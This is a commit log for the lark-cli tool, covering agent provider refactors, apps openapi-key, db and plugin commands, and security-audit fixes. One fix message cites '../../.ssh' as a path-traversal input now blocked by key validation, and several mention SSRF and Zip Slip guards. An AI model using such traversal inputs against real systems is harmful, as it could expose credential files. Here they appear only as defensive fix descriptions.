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Author SHA1 Message Date
liuxinyang.lxy
3900974469 refactor: capability-registration provider model (func fields, framework-gated)
Replace the fat 9-method Provider interface with a struct of function fields,
mirroring the events KeyDefinition / shortcuts Shortcut convention: a provider
wires only the capabilities it supports and leaves the rest nil. This removes the
two things every integrator previously had to keep in sync by hand — the
Capabilities bool matrix and the per-method ErrUnsupported returns.

- Provider is now a struct: core Send/GetTask (mandatory, asserted at Register)
  plus optional func fields (ListTasks/CancelTask/context trio/DownloadArtifact/
  ListAgents) whose presence == support, plus FileInput/InputRequired flags and
  an optional Describe for per-agent card metadata.
- The card capability matrix is DERIVED from which fields are wired
  (DeriveCapabilities / BuildCard), so declaration and behavior are single-
  sourced and cannot drift. CatalogEntry drops its Capabilities field.
- The command layer gates every optional verb on the nil field and returns a
  unified unsupported_capability (exit 2) before any network access; the
  ErrUnsupported sentinel and convertUnsupported are deleted. --file is now
  capability-gated too (file_input=false ⇒ unsupported before the upload prompt).
- The Discoverer interface becomes the ListAgents field; catalog providers must
  wire it (asserted at Register). example expresses echo's minimal set vs
  reporter's full set purely by which fields its Factory wires per agent — no
  bool matrix, no refusal code. Conformance + tests updated to the new shape.
2026-07-08 13:22:37 +08:00
liuxinyang.lxy
603b9b7b43 refactor: move agent providers to top-level agent/ package
Mirror the events layering: the framework/SPI stays in internal/agent, the
concrete business providers move to a top-level agent/ package (agent/example/),
and agent/register.go blank-imports each so their init() self-registration runs.
cmd/build.go blank-imports the top-level agent package (alongside events); the
command layer (cmd/agent) no longer wires providers directly.

A test-only blank import keeps the example scheme registered for cmd/agent
tests, which exercise example:echo / example:reporter offline.
2026-07-08 12:35:57 +08:00
liuxinyang.lxy
8f54f9e77e docs: add lark-agent skill for the agent command tree
lark-agent skill: a framework-layer SKILL.md (verb contract, task state
machine, polling, exit codes) written with provider placeholders, plus
per-provider files under references/providers/. Adding a provider means
adding one provider file; the framework docs and verb references stay put.
2026-07-08 11:48:37 +08:00
liuxinyang.lxy
6c8ea37340 feat: add example provider, StaticCatalog scaffolding and conformance harness
- StaticCatalog (internal/agent/catalog.go): a framework helper carrying
  the catalog-provider boilerplate — enumeration, per-agent card lookup
  and typed unknown-id errors — so catalog providers do not reinvent it.
- agenttest.RunConformance: a one-call conformance suite pinning the SPI's
  implicit contracts (registration metadata, zero-Deps factory, card
  single source, enumeration stability).
- example provider (internal/agent/example): an offline in-memory
  reference provider (echo / reporter, deliberately different capability
  matrices) that doubles as the provider-onboarding template and the
  command tree's zero-network demo backend.
2026-07-08 11:48:37 +08:00
liuxinyang.lxy
f837ebf64e feat: add provider-neutral agent command tree
Add the `lark-cli agent` command tree: a provider-neutral surface over
remote A2A agents. One constant verb set (list / card / send / task /
context) routes by agent_ref (<scheme>:<agent_id>) to registered
providers; remote agents never grow new top-level commands and their
capabilities are declared in a machine-readable card.

- SPI (internal/agent): Provider interface, registry with fail-fast
  registration checks, typed ProviderKind / IdentityType, a closed
  Capabilities struct, NewCard single-source card synthesis, and the
  9-state task machine aligned with A2A.
- Command surface (cmd/agent): list / card / send / task / context with
  default JSON envelopes, meta.next suggested commands, fire + bounded
  `--watch --timeout` polling, local all-or-nothing scope preflight,
  and capability gating. Two CLI-enforced high-risk-write confirmations:
  `send --file` (off-machine upload) needs --yes, and artifact download
  refuses to clobber an existing -o target without --force; both return
  confirmation_required (exit 10) before any network/write. Artifact
  download is SSRF-guarded, https-only and size-capped.
- Typed error contract with stable exit codes and codemeta classification.
- Ignore local-only proof artifacts (tests_e2e/, tests_skill_eval/,
  coverage.html).
2026-07-08 11:48:37 +08:00
HanShaoshuai-k
e8bfbab4a5 fix: reduce public content credential false positives (#1700) 2026-07-01 17:46:33 +08:00
zgz2048
3bda9e17de fix: support field create json array input (#1661) 2026-07-01 16:08:55 +08:00
ILUO
e753b15d84 fix: expose completion state in my tasks output (#1641)
* fix: expose completion state in my tasks output

* test: cover my tasks pretty completion state
2026-07-01 15:41:57 +08:00
dc-bytedance
bdffffb368 feat: interactive upgrade prompt for bare lark-cli (#1498) 2026-07-01 15:07:18 +08:00
dc-bytedance
ec6fdc9b30 feat: fail closed when checksums.txt is missing during install (#1503) 2026-07-01 13:23:23 +08:00
liangshuo-1
775ee5a501 chore: release v1.0.61 (#1695) 2026-06-30 22:18:39 +08:00
liujinkun2025
214318aa02 fix: support bot identity for drive search (#1670) 2026-06-30 21:59:51 +08:00
liangshuo-1
6f2cddfce1 fix(identity): correct identity diagnosis under external credential providers (#1693) 2026-06-30 21:56:03 +08:00
wangwei
75926f9744 feat(apps): add db, file, openapi-key and observability shortcuts (#1596)
* feat: add apps observability helpers

* feat: add apps log observability shortcuts

* feat: add apps trace observability shortcuts

* feat: add apps metric analytics shortcuts

* feat: add apps envvar shortcuts

* docs: document apps observability envvar shortcuts

* fix: add apps observability env hint

* test: cover apps envvar delete dry-run

* fix: align apps observability OpenAPI schema

* fix: map apps observability named series

* fix: apps observability api upgrade

* fix: refine apps observability output

* feat(apps): integrate miaoda db/file CLI commands into apps-spark integration

Bring in the refined miaoda Spark db/file command set from the
feat/miaoda-db-file-openapi work: db execute (typed errs + per-SQL-type
JSON shaping), env diff/migrate, PITR recovery, changelog/audit, data
import/export, db/file quota, and the 7 file-storage commands; plus the
stderr spinner for slow ops and the aligned lark-apps skill references.

Resolved overlap with the integration branch's earlier db-execute
iteration (took the refined typed-error version), unified the stderr-TTY
flag on IOStreams.StderrIsTerminal, and combined the shortcut registry
(43 commands total).

* feat(apps): add openapi-key shortcuts for open API key management (#1576)

* feat(apps): add openapi-key common helpers (mask/redact/config)

* feat(apps): add +openapi-key-list (redacted)

* feat(apps): add +openapi-key-get (redacted)

* feat(apps): add +openapi-key-create (one-time raw secret)

* feat(apps): add +openapi-key-update

* feat(apps): add +openapi-key-enable / +openapi-key-disable

* feat(apps): add +openapi-key-delete (high-risk-write)

* feat(apps): add +openapi-key-reset (rotate, one-time new secret)

* test(apps): assert reset surfaces raw key exactly once

* feat(apps): register openapi-key shortcuts

* docs(lark-apps): add openapi-key reference and routing

* test(apps): update shortcut count for openapi-key commands

* fix(apps): trim openapi-key update name and correct shortcut-count comment

* fix(apps): use camelCase config and add scope-all/scope-api flags

Replace snake_case wire keys (request_scope, is_allow_access_preview) with
camelCase (requestScope, isAllowAccessPreview, allowAll, httpInfos, httpMethod,
httpPath). Replace opaque --scope passthrough with --scope-all / --scope-api
friendly flags; --scope remains as raw-JSON escape hatch, mutually exclusive
with the friendly flags. Shared oapiKeyValidateScopeFlags replaces the old
per-file oapiKeyValidateScope.

* fix(apps): use Changed for scope-all and refresh openapi-key scope docs

Switch the update at-least-one guard from rctx.Bool to rctx.Changed for
--scope-all, matching the --allow-preview pattern so --scope-all=false
explicitly counts as provided.

Rewrite lark-apps-openapi-key.md scope section: camelCase requestScope
shape, --scope-all/--scope-api/--scope flags with mutual-exclusion rules,
and scope-value discovery via the app's docs/openapi.json.

* fix(apps): emit snake_case request_scope config for open gateway

Open gateway (/open-apis/spark/v1) requires snake_case request bodies;
flip parseScopeAPI/buildRequestScope/buildKeyConfig to emit http_method,
http_path, allow_all, http_infos, request_scope, is_allow_access_preview.
Update unit tests to assert snake_case and reject camelCase keys.

* docs(lark-apps): correct openapi-key scope to snake_case wire format

* docs(apps): align openapi-key flag help text to snake_case wire keys

* feat(apps): add actionable hints and more examples to openapi-key

P1: chain .WithHint(...) on every validation error in the openapi-key
commands (app-id, key-id, scope mutual-exclusion, invalid JSON, scope-api
format, name required, at-least-one) so agents always get a next-step.
P3: expand Tips to 2-3 concrete examples on create (basic / scoped /
scope-all) and list (with --limit); reset already had 2 examples.
P4: strip per-command flag columns from the reference routing table;
scope SOP, security口径, and one-time-key sections are unchanged.

* refactor(apps): rename db --env to --environment (hard rename)

Make --environment the only accepted db environment flag across the db
commands (execute, table-list/get, env-create, data export/import,
changelog, audit status/enable/disable/list, quota). The old --env is
removed: it is registered only as a hidden flag so that passing it
returns a clear typed validation error pointing to --environment,
rather than a generic unknown-flag failure. Update the lark-apps db
references accordingly.

* fix: upgrade observability and env

* feat: rename app observability commands to list

* feat(apps): default db --environment to dev across all db commands

Unify the db environment flag default to dev for every db command (was
online for table-list/get, data export/import, changelog, audit, quota;
execute/env-create were already dev). Clarify --help: use online for the
online environment or for an app whose DB is not multi-env. Update the
lark-apps db references: all db commands default dev, a non-multi-env
app's DB lives in online (pass --environment online), and db-execute does
not wrap transactions for you — control transaction boundaries yourself
with BEGIN/COMMIT in the SQL.

* fix: remove unsed files

* file_common.go 的 3 处裸 fmt.Errorf 已改为 typed errs.NewValidationError(errs.SubtypeInvalidArgument, ...)(时间格式校验错误,归 validation)

* fix(apps): resolve openapi-key CI gate failures (#1604)

* test(apps): use placeholder api_key values in openapi-key tests

* fix(apps): return typed errs from openapi-key scope helpers

* fix(apps): rename openapi-key status enum to dodge credential scanner

* fix(apps): reword openapi-key pretty labels to dodge credential scanner

* fix(apps): rename openapi-key delete local var to dodge credential scanner

* test(apps): dodge credential scanner in openapi-key test mock data and messages

* style(apps): gofmt openapi-key common test after fixture rename

* test(apps): align db dry-run e2e with --environment rename and dev default

db dry-run tests still used the removed --env flag and asserted the old
online default, breaking the Run dry-run E2E tests CI step after the
--environment hard rename and dev-default change. Switch --env to
--environment and assert the dev default; rename the table-list subtest
to reflect the dev default.

* fix: improve env-pull dev database hint (#1614)

* feat(plugin): add plugin package management commands (#1609)

* feat: add plugin package and instance management commands for apps domain

Add 8 new shortcut commands under `lark-cli apps`:

Plugin package management (aligned with fullstack-cli):
- +plugin-install: download tgz, extract to node_modules, update package.json
- +plugin-uninstall: remove from node_modules and package.json actionPlugins
- +plugin-list: list declared plugins with installation status

Plugin instance CRUD (aligned with feida-ai):
- +plugin-instance-create: validate + write capability JSON with formValue validation
- +plugin-instance-update: merge mutable fields, re-validate formValue
- +plugin-instance-delete: idempotent file removal
- +plugin-instance-get: read capability JSON
- +plugin-instance-list: scan capabilities directory

Shared infrastructure (plugin_common.go):
- 4-level capabilities dir resolution (flag → env → .env.local MIAODA_APP_TYPE → detection)
- formValue validation ported from feida-ai (5 rules: forbidden Handlebars, paramsSchema
  type constraints, input ref existence, unconsumed params, array double-wrap auto-fix)
- tgz extraction with path traversal protection
- package.json actionPlugins management
- Install version check with mismatch warnings

* fix: close install gaps aligned with fullstack-cli

- latest version: re-check installed version after API resolves, skip
  download when already up to date
- actionPlugins sync: ensure package.json record is updated even when
  install is skipped (already_installed path)
- peerDependencies: warn about missing peer deps after extraction
  instead of silently ignoring them

* feat: add +plugin-instance-types command and auto-generate on create/update

Generate TypeScript interface definitions from plugin instance's paramsSchema
and manifest actions (inputSchema/outputSchema), written to shared/plugin-types.ts
with per-id block replacement (same id overwrites, different id appends).

Aligned with feida-ai's generateTypeDefinitions + persistPluginTypes logic:
- toPascalCase for type name prefixes (handles digit-prefixed segments)
- JSON Schema → TypeScript recursive conversion
- Block markers: // ---- plugin:{id} ---- / // ---- end:{id} ----
- Auto-invoked after +plugin-instance-create and +plugin-instance-update
- Also available as standalone +plugin-instance-types --id <id>

* fix: hide +plugin-instance-types from agent (auto-invoked by create/update)

* feat: add plugin skill files for agent workflow guidance

- lark-apps-plugin.md: entry skill with intent routing, command reference,
  project context confirmation, and iron rules
- plugin-create-instance-flow.md: 6-step create flow with precondition checks
- plugin-update-instance-flow.md: update flow with paramsSchema change detection
- plugin-delete-instance-flow.md: delete flow with code reference scanning
- plugin-get-instance-flow.md: query routing for list/get/manifest reads
- plugin-instance-schema.md: variable mapping rules, param types, formValue
  generation, AI prompt templates, ID generation rules
- plugin-instance-call.md: app-type-aware calling guide (design vs fullstack),
  normalizeStream, chunk field reference, server-side NestJS patterns
- plugin-retry-protocol.md: validation failure retry protocol (max 3)
- SKILL.md: add plugin intent route with trigger keywords

* feat: add --local flag to +plugin-install for local tgz installation

Supports installing plugin packages from local .tgz files without API
calls, useful for testing and offline development. Reads plugin key and
version from the extracted package.json inside the tgz.

Also moved Scopes to ConditionalScopes so --local path skips auth.

* fix: improve error messages for plugin install and check

- pluginCheckInstalled: distinguish "directory not exist" (not installed)
  vs "directory exists but manifest.json missing" (not built correctly),
  with specific hints for each case
- pluginResolveVersion: detect non-JSON API response (typically HTML 404
  from unregistered endpoint) and give clear "API not available" message
  instead of misleading "check plugin key spelling"
- Hide --local flag from help (dev/test only, not for agents)

* refactor: consolidate plugin skill files from 9 to 3, add catalog and design guidance

- Merge plugin-instance-schema, create/update/delete/get flows, and
  retry-protocol into lark-apps-plugin-crud.md (Schema + CRUD + retry)
- Merge plugin-catalog into lark-apps-plugin.md (entry + catalog +
  selection/design guidance + CRUD routing)
- Restructure plugin-instance-call.md into decision vs code-pattern
  sections with tech-stack Skill delegation note
- Add complete AI plugin catalog (17 plugins with capabilities, output
  modes, use cases), user intent→plugin mapping, atomization principle,
  and chain-link rules
- Expand plugin field mapping table from 8 to all 17 AI plugins
- Add AI plugin trigger keywords to SKILL.md description for host agent
  skill matching
- Rename files to lark-apps-plugin-* prefix for consistency

* refactor: slim down plugin-call to decisions only, delegate code patterns to tech-stack skill

Remove all code pattern content (capabilityClient imports, normalizeStream,
NestJS injection, streaming examples, chunk field table) from
lark-apps-plugin-call.md. These belong in the tech-stack steering skill
(plugin-guide), not the lark-cli skill layer.

The file now contains only call-side decisions (Client vs Server,
persistence, Schema card, failure logging) and directs the agent to
read the tech-stack plugin-guide skill for actual code writing.

* fix: use absolute project-path for tech-stack skill location in plugin-call

Replace relative .agent/skills path with <project-path> prefix anchored
to the project root determined in the earlier context confirmation step.
Add fallback path and minimal call rules when skill file doesn't exist.

* fix: remove fallback minimal rules from plugin-call, rely on tech-stack skill

* fix: require reading project plugin-guide skill before writing call code

* fix: improve plugin error hints for AI agent friendliness

- Version mismatch warning now includes the exact +plugin-install
  command to update
- Batch install (+plugin-install without --name) now re-installs
  when declared version differs from installed version
- Remove --local flag from user-facing error hints (internal-only)

* docs: add plugin package ≠ npm package distinction to skill docs

Add a comparison table and iron law #6 to prevent agents from confusing
+plugin-install with npm install, which was a recurring failure in
multi-model evaluation.

* fix: block plugin uninstall when instances still reference the package

Add pluginCheckDependentInstances to scan capabilities/ for instances
that reference the plugin being uninstalled. When dependent instances
exist, the uninstall is blocked with a failed_precondition error listing
the instance IDs and a hint to delete them first.

* fix: update plugin API paths to match new OpenAPI gateway routes

- batch_get: /plugins/-/versions/batch_get → /plugin/versions/batch_get
- download: /plugins/:scope/:name/versions/:version/package → /plugin/versions/download_package?plugin_key=&version=

* fix: update plugin install to match final OpenAPI gateway protocol

- batch_query: URL /plugin/versions/batch_query, request uses plugin_keys
  array + latest_only boolean, response uses flat data.items list with
  plugin_key/plugin_version fields
- download: changed from GET+query to POST+JSON body {plugin_key, plugin_version},
  response is binary tgz stream (supportFileDownload)
- scope: spark:plugin:readonly → spark:app:read

* fix: align dry-run output with new batch_query + download_package request format

* fix: match actual API response field names (key/version instead of plugin_key/plugin_version)

* docs: strengthen plugin reference reading rules from advisory to mandatory

Change lark-apps-plugin.md from implicit to explicit required reading
for any plugin work. Replace soft '按需读' with bold '必读' for all three
plugin reference files. The available plugin catalog and plugin selection
table only exist in lark-apps-plugin.md — skipping it caused models to
fall back to npm search and parameter guessing.

* fix: remove call example annotation from types, add skill reference instead

* refactor: streamline plugin skill files

* refactor: 插件 PE 下沉到仓库,lark-cli 侧精简为命令参考

- 删除旧的 3 个插件 reference(plugin.md / plugin-crud.md / plugin-call.md),
  其中的 Schema 规则、CRUD 流程、插件目录、Prompt 模板等内容已下沉到
  应用仓库 .agents/skills/plugin-guide/SKILL.md
- 新建 8 个按命令拆分的 reference,风格与 +create / +list 一致:
  plugin-install / plugin-uninstall / plugin-list /
  plugin-instance-create / update / delete / get / list
- 更新 SKILL.md:description 泛化触发词(不再列举 17 个具体能力),
  意图路由引导先读仓库 Skill 再看 CLI 命令参考

* fix(plugin):simplify skill docs and resolve plugin version from actionPlugins

Remove redundant skill documentation (pre-check table, validation error
examples, JSON return samples, fullstack-cli references) that duplicate
CLI error hints.  Make --plugin version optional and resolve from
package.json actionPlugins.  Drop unused createdBy field.

* fix: 去掉 reference 中的具体插件名和参数示例,强制 agent 读仓库 Skill

- 所有 plugin-key 改为占位符,注明从仓库 Skill 的插件目录获取
- instance-create / instance-update 加前置条件门禁:未读仓库 Skill 直接执行会导致参数错误
- 防止 agent 跳过仓库 Skill 凭示例猜测插件名

* fix(plugin): resolve real paths in dry-run output for instance commands

Replace <capabilities_dir> placeholders with resolved paths so models
can see actual file locations before execution. Add version_source,
types_output, and scan_dir fields to describe implicit behaviors.

* refactor(plugin): hide instance commands, delegate to repo Skill

Hide +plugin-instance-create/update/delete/get/list from CLI help.
Remove instance reference files from lark-apps skill. Route instance
CRUD and call code generation to project repo plugin-guide skill.

Go instance code preserved, just hidden.

* refactor: 删除 plugin-instance 5 个 CLI 命令,改由仓库 Skill 引导 agent 直接操作文件

- 删除 plugin_instance_create/update/delete/get/list 及其测试(11 个文件)
- 删除 plugin_instance_types(TypeScript 类型生成命令)
- 移除 shortcuts.go 中的 6 个注册项
- 清理 plugin_common.go 中仅被 instance 命令使用的函数(1054→340 行):
  校验逻辑、capability JSON 读写、动态 schema 解析、TypeScript 生成等
- 保留 plugin-install / plugin-uninstall / plugin-list 三个命令不变

插件实例的 CRUD 操作改由仓库 Skill 引导 agent 直接读写 capabilities/*.json,
验证规则写在 Skill 中由 agent 自校验。

* refactor(plugin): remove --project-path flag and split --name into --name + --version

- Remove --project-path from plugin-install/list/uninstall (use cwd like npm)
- Split --name key@version into separate --name and --version flags
- Remove pluginParseInstallTarget (no longer needed)
- Improve DryRun desc and error hints for --version usage
- Update skill docs to reflect new flag structure
- Tests use chdirTest helper instead of --project-path

* feat(plugin): add Examples to --help for plugin-install/list/uninstall

按 lark-cli 优化治理规范,为三个插件命令的 --help 补充 2-3 个
可执行示例,覆盖最常见使用路径,帮助 agent 快速理解命令用法。

* fix(plugin): address PR #1609 review findings

- Fix hint referencing non-existent +plugin-instance-delete command,
  point to repo plugin-guide Skill instead
- Remove undeclared --capabilities-dir flag, simplify pluginResolveCapDir
  to env-only resolution, fix ambiguous hint to suggest env vars
- Reclassify download errors from file_io to network/api with proper
  hints and retryable marking
- Slim SKILL.md routing row, move judgment rules to plugin-install reference
- Rename --local flag to --file to align with CLI conventions

* fix(skill): restore plugin routing row with judgment rules, fix markdown formatting

Revert SKILL.md routing row to keep full judgment rules and repo Skill
directive inline. Fix bold marker spacing and restore missing table column.
Revert reference to original content without duplicated rules.

* fix(plugin): revert SKILL.md to pre-review version, fix shortcut count test

Restore SKILL.md plugin routing row to original version with full
judgment rules and repo Skill directive. Update shortcut count test
from 60 to 63 to account for 3 new plugin commands.

* fix(plugin):fix lark-apps skill docs which is about plugin

* fix(plugin):correct plugin skill md

* fix(plugin):correct plugin md

* fix(plugin):correct plugin and local dev skills md

* fix(plugin):correct apps plugin skills md

* fix(lark-apps): move repo skill reading hint to post-init phase

将「仓库 Skill 优先」从 SKILL.md 意图路由顶部移除,
改在 +init 完成后的 local-dev reference 中提示 agent 读取
仓库 plugin-guide SKILL.md,解决应用未初始化时 repo skill
不存在导致 agent 无法获取插件知识的时序问题。

* fix(lark-apps): strengthen local-dev reference reading and post-init plugin guide

- SKILL.md 路由表:local-dev.md 从"按需读取"提升为"执行前必读"
- local-dev.md:将读仓库 Skill 嵌入端到端流程链作为正式步骤
- post-init 指引改为可执行命令 + 不读的后果说明 + 不存在时兜底

---------

Co-authored-by: zhangli <zhangli.268@bytedance.com>

* feat(apps): add release polling interval time and release time costs

* fix(plugin): rename files to apps_ prefix and handle Close() errors (#1655)

- Rename plugin_install/list/uninstall .go files to apps_plugin_ prefix
  for consistency with other files in the package
- Handle f.Close() errors in pluginExtractTGZ to avoid silent data loss

* style: gofmt apps plugin files (#1664)

* fix(plugin): resolve CI lint, deadcode, and unit-test failures (#1667)

- Add Scopes: []string{} to plugin-install, plugin-list, plugin-uninstall
  shortcuts to satisfy TestAllShortcutsScopesNotNil
- Remove unused pluginCheckInstalled function (deadcode)
- Fix nilerr: add //nolint:nilerr for intentional best-effort nil returns
- Fix forbidigo: replace bare fmt.Errorf in Execute with typed error,
  add //nolint:forbidigo for intermediate helper errors in pluginExtractTGZ
- Fix errorlint: change %v to %w for cerr in multi-error fmt.Errorf
- Remove all unused //nolint:forbidigo directives from test files

* style: gofmt apps_plugin list/uninstall/install_test files

Fix fast-gate Check formatting failure: align struct literal fields in
apps_plugin_list.go and apps_plugin_uninstall.go, and split the if-body
statement onto its own line in apps_plugin_install_test.go.

* fix(plugin): fix nolint directive format and nilerr placement in plugin_common.go (#1668)

- Change nolint comment separator from -- to // to satisfy nolintlint
- Move nilerr nolint directive to return statement to suppress nilerr correctly
- Fix forbidigo nolint format for intermediate fmt.Errorf in pluginExtractTGZ

* fix(apps): validate openapi-key scope method, path and raw JSON (#1675)

Enforce an HTTP method whitelist (GET/POST/PUT/PATCH/DELETE), reject
malformed --scope-api paths (must start with '/', no '..' or '//'), and
constrain raw --scope JSON to the documented request_scope schema
(allow_all + http_infos only). Validation runs in both the Validate hook
and the body-build path so dry-run and execute are equally gated.

Fixes PR #1596 audit findings HIGH-2 and MEDIUM-4.

* fix(apps): harden db/file shortcuts per security audit (PR #1596)

Address the file/db findings from the PR #1596 security audit with
safer header/flag/path handling:

- HIGH-3 (--output path traversal): add rejectOutputTraversal() and wire
  it into +file-download and +db-data-export Validate; reject absolute
  paths and any .. component up front. (FileIO.Save already sandboxes to
  cwd via SafeOutputPath; this is an earlier, explicit guard.)
- HIGH-4 (Content-Disposition header injection): build the header with
  mime.FormatMediaType instead of manual string concatenation.
- MEDIUM-3 (SQL leaked into public flag): stop writing --file contents
  back into the --sql flag; resolveExecuteSQL() reads it at use-site so
  SQL never lands in flag dumps / structured logs.
- LOW-1 (hidden-file upload name): prefix sanitized upload names that
  start with '.' with '_'.
- LOW-2 (local-timezone time parsing): document local-tz interpretation
  of bare date/datetime in flag descriptions and the db/file skill docs.

SQL-injection of --table (audit MEDIUM-5) is intentionally NOT validated
in the CLI: the server-side interface is the authoritative guard.

Add apps_security_fixes_test.go covering the new validators and switch
the upload test to parse Content-Disposition instead of matching a
literal string. Update lark-apps-db.md / lark-apps-file.md skill refs.

* fix(plugin): harden plugin commands against path traversal, DoS, and agent misuse (#1677)

Security fixes from PR #1596 security audit:
- Skip symlink/hardlink entries during tgz extraction (Zip Slip)
- Limit tgz entry and download size to 10 MB (OOM/DoS)
- Limit error response body read to 4 KB
- Validate MIAODA_APP_TYPE as numeric to prevent path manipulation
- Add validatePluginKey + secureModulePath to block --name path
  traversal (../../.ssh etc.) for install/uninstall

Usability fix:
- Add explicit 'local command, no --app-id' notice in plugin
  reference docs to prevent agent from incorrectly passing
  --app-id to plugin commands (which read package.json locally)

* fix(apps): cap db async poll timeout at 2 minutes

+db-recovery-apply blocked up to 30min and +db-env-migrate /
+db-recovery-diff up to 10min while polling the server for async-task
completion. These operations are expected to finish within ~1 minute;
the long ceilings mostly hurt agents, whose harness kills the command on
timeout while the server-side operation keeps running with no handle to
re-query — especially risky for the irreversible recovery-apply.

Cap all three pollUntil ceilings at 2 minutes (polling interval
unchanged). Stuck operations now surface the retryable network/timeout
envelope after 2min instead of hanging for 10-30min.

* fix(plugin): create temp dir in project path to avoid cross-filesystem EXDEV on Rename (#1683)

pluginInstallLocal used os.MkdirTemp("") which creates the temp
directory on the system temp partition. On Windows (and some
Linux/macOS setups), the temp partition is on a different filesystem
from the project directory, causing os.Rename to fail with EXDEV.

Use projectPath as the temp dir parent so it is always on the same
filesystem as node_modules.

* fix(plugin): improve --help Tips with local-command hint and update semantics (#1691)

- Add "Run in project root; does NOT take --app-id" to all plugin Tips
- Clarify install command also supports update (install or update to latest/specific version)
- Clarify batch install reads from package.json actionPlugins

---------

Co-authored-by: 陈兴炀 <chenxingyang.1019@bytedance.com>
Co-authored-by: raistlin042 <lvxinsheng@bytedance.com>
Co-authored-by: anngo-nk <anguohui@bytedance.com>
Co-authored-by: zhangli <zhangli.268@bytedance.com>
2026-06-30 21:11:27 +08:00
linchao5102
5c4ad52741 fix: harden git credential error handling (#1676) 2026-06-30 19:57:04 +08:00
wangweiming-01
3fcb695698 docs: guide document copy skill usage (#1673) 2026-06-30 16:47:06 +08:00
mew
fb042758db feat: add whoami command showing effective identity (#1666) 2026-06-30 15:56:56 +08:00
SunPeiYang996
22108c3300 feat(docs): add reference map flags (#1547) 2026-06-30 12:07:18 +08:00
liuxin-0319
31744f8cf9 docs: fix lark-doc media token examples (#1662) 2026-06-30 11:47:14 +08:00
liangshuo-1
1dd0758091 chore: release v1.0.60 (#1657) 2026-06-29 22:34:36 +08:00
yballul-bytedance
4a5a669b1a fix(auth): remove 'claude settings' (#1654) 2026-06-29 21:58:22 +08:00
liangshuo-1
ebb0b6fe73 feat(affordance): per-command usage guidance system (markdown source) (#1565) 2026-06-29 19:33:27 +08:00
liangshuo-1
5c0a36b2a6 feat(transport): add LARK_CLI_NO_PROXY_WARN to silence proxy warning (#1647) 2026-06-29 19:31:48 +08:00
mazhe-nerd
21905b0ba1 fix(install): load @clack/prompts via dynamic import to avoid ERR_REQUIRE_ESM (#1636) (#1652) 2026-06-29 19:16:37 +08:00
yballul-bytedance
602c788fd9 feat(authorization): expand lark-shared auth guidance and assert clean logout JSON (#1598)
- skills/lark-shared/SKILL.md: broaden skill description to cover auth login/status/logout, --domain business-domain scopes, missing scopes and authorization revocation; add an auth task quick-reference table mapping user intents to lark-cli commands; document LARKSUITE_CLI_NO_UPDATE_NOTIFIER / LARKSUITE_CLI_NO_SKILLS_NOTIFIER env vars for stable JSON; soften _notice.update handling so it no longer interrupts the current task.
- cmd/auth/logout_test.go: in TestAuthLogoutRun_JSONMode_Success_WritesStdoutOnly, additionally assert that the success JSON payload has no 'message' field, matching the contract that logout success only carries loggedOut=true.
2026-06-29 16:28:57 +08:00
HanShaoshuai-k
30b28cf17f fix: reduce public content false positives 2026-06-29 14:02:43 +08:00
calendar-assistant
297776ea66 feat(event): support VC meeting lifecycle events (#1632) 2026-06-29 11:11:23 +08:00
Max Coplan
5b0c3137e3 test(doc): derive fetch test flag defaults from v2FetchFlags (#1428)
Replace hardcoded flag defaults in the fetch test helpers with
fetchDefault() / fetchDefaultInt() helpers that read the declared
defaults from v2FetchFlags(). This prevents future drift between
production flag defaults and test setup, and panics loudly if a
flag name is misspelled rather than silently returning "".

The tests now correctly avoid hardcoding doc-format, but other
flag defaults (detail, revision-id, scope, etc.) were still
duplicated here. Deriving all defaults from v2FetchFlags() keeps
the whole test command definition aligned with production.

Co-authored-by: TraeCli (Doubao-Seed-Dogfooding) <trae@bytedance.com>
Co-authored-by: fangshuyu <fangshuyu@bytedance.com>
2026-06-29 11:09:51 +08:00
xiongyuanwen-byted
4c31323de1 feat(sheets): use office_sheet_file parent_type for imported office spreadsheets (#1606)
Image uploads to a spreadsheet hard-coded parent_type=sheet_image at every
entry point. Imported "office" spreadsheets carry a token prefixed with
"fake_office_", for which the drive backend requires
parent_type=office_sheet_file. Funnel the parent_type selection through a
single sheets-domain helper so the rule lives in one place and every
image-upload path (float-image, +cells-set-image, backward +media-upload,
and every dry-run preview) stays consistent.

- Add sheetMediaParentType(token) in the sheets domain: returns
  office_sheet_file for fake_office_-prefixed tokens, otherwise sheet_image.
- Add an uploadSheetImage(...) collector that builds the
  DriveMediaUploadAllConfig (including parent_type) once, replacing the
  per-call-site hand-rolled configs.
- Route both main-domain image entries through the collector — float-image
  local upload and +cells-set-image — covering Execute and the dry-run
  preview body/desc.
- Cover the backward +media-upload entry: single-part, multipart (>20MB),
  and both dry-run bodies. backward is a separate package and an
  intentional verbatim mirror of shortcuts/sheets/, so it keeps its own
  copy of the helper rather than importing the main domain.
- Leave the shared common.UploadDriveMediaAllTyped upload layer untouched
  — the fake_office_ rule is sheets-specific and must not leak into
  mail/slides/doc/drive/base.

Tests:
- Pure-function TestSheetMediaParentType (5 cases incl. prefix-only and
  mid-string non-match).
- Main-domain dry-run TestCellsSetImage_DryRunOfficeParentType and
  TestUploadSheetImage_ParentType / _FileOpenError that exercise the
  Execute path on the wire, asserting parent_type via the captured
  multipart body and typed validation metadata (errs.ProblemOf
  category/subtype, fs.ErrNotExist cause preserved) on file open errors.
  decodeSheetMediaMultipartBody fails fast on NextPart / ReadFrom errors
  rather than silently producing a partial body.
- backward TestSheetMediaUploadExecuteOfficeParentType (real multipart
  wire) and TestSheetMediaUploadDryRunSmallFileOfficeParentType
  (small-file dry-run preview for fake_office_).
- cli_e2e tests/cli_e2e/sheets/sheets_image_upload_dryrun_test.go: --dry-run
  end-to-end across +media-upload and +cells-set-image, native and
  fake_office_ tokens, asserting api.0 is POST upload_all with
  parent_type=sheet_image / office_sheet_file and parent_node = token.
2026-06-27 16:16:56 +08:00
liangshuo-1
8a268aa2d2 chore: release v1.0.59 (#1617) 2026-06-26 20:46:51 +08:00
ethan-zhx
39d60cb706 feat: add slides replace-pages and xml-get shortcuts (#1585)
* feat: add slides replace-pages shortcut

* feat: add slides xml get shortcut

* fix: stop advertising slides screenshot scope

* feat: expose slides presentation url
2026-06-26 15:56:55 +08:00
SunPeiYang996
d9330b7ab3 fix(docs): hide docs api-version compat flag (#1580) 2026-06-26 14:32:09 +08:00
hugang-lark
6b833257c7 fix: optimize calendar,vc,minutes,note shortcut and skill (#1571) 2026-06-26 12:24:03 +08:00
zhangjun-bytedance
ba51d4874e feat: support speaker list and nolark speaker replace (#1594) 2026-06-26 11:41:32 +08:00
liangshuo-1
40a09c8957 chore: release v1.0.58 (#1586) 2026-06-25 21:57:36 +08:00
taojieyeta-design
806e8679f6 feat: sync approval skill for meta api commands (#1499)
